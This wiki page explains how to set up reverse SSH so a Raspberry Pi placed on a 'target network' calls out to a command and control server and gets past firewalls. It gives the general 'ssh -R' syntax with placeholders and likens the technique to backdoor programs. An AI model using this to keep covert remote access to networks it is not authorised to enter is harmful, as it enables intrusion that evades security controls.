RaspberryPi/Reverse SSH

From charlesreid1

Revision as of 04:13, 4 August 2015 by Admin (talk | contribs) (Created page with "How to control the Pi once it is placed on a target network? SSH is an obvious way. Incoming SSH connections can/will be blocked by firewalls or other security measures. Rev...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

How to control the Pi once it is placed on a target network? SSH is an obvious way.

Incoming SSH connections can/will be blocked by firewalls or other security measures. 

Reverse SSH is a good alternative to gain an SSH shell.

Reverse SSH: instead of the command and control server connecting to the Raspberry Pi, the Raspberry Pi initiates the connection to the command and control server. This is the same technique used by many backdoor programs.

SSH Command

The command and control server listens for the Pi. When the Pi is online, it calls the ssh command and connects to the remote command and control server.

Normally, when you SSH to a machine, you execute a command like: 

$ ssh user@remoteserver

But if you use the -R flag, it enables a reverse connection to the listener. 

$ ssh  -R  [bind_address:]port:host:hostport  username@remoteserver

Let's ignore bind_address for now.

The port indicates which port on your Raspberry Pi you want to use to get out of the network. Port 22 is the standard SSH port, but this may not be open on the network firewall that your Pi is on. Pick a port you know will be open and use that for port.

host indicates the destination for the tunnel. Once we SSH from the Raspberry Pi into the command and control server, our tunnel is entirely local. So we create a local tunnel from port to hostport. And our host is localhost.

Finally, the username@remoteserver enables us to create an SSH connection to the remote server in the first place.

Retrieved from "https://charlesreid1.com/w/index.php?title=RaspberryPi/Reverse_SSH&oldid=7601"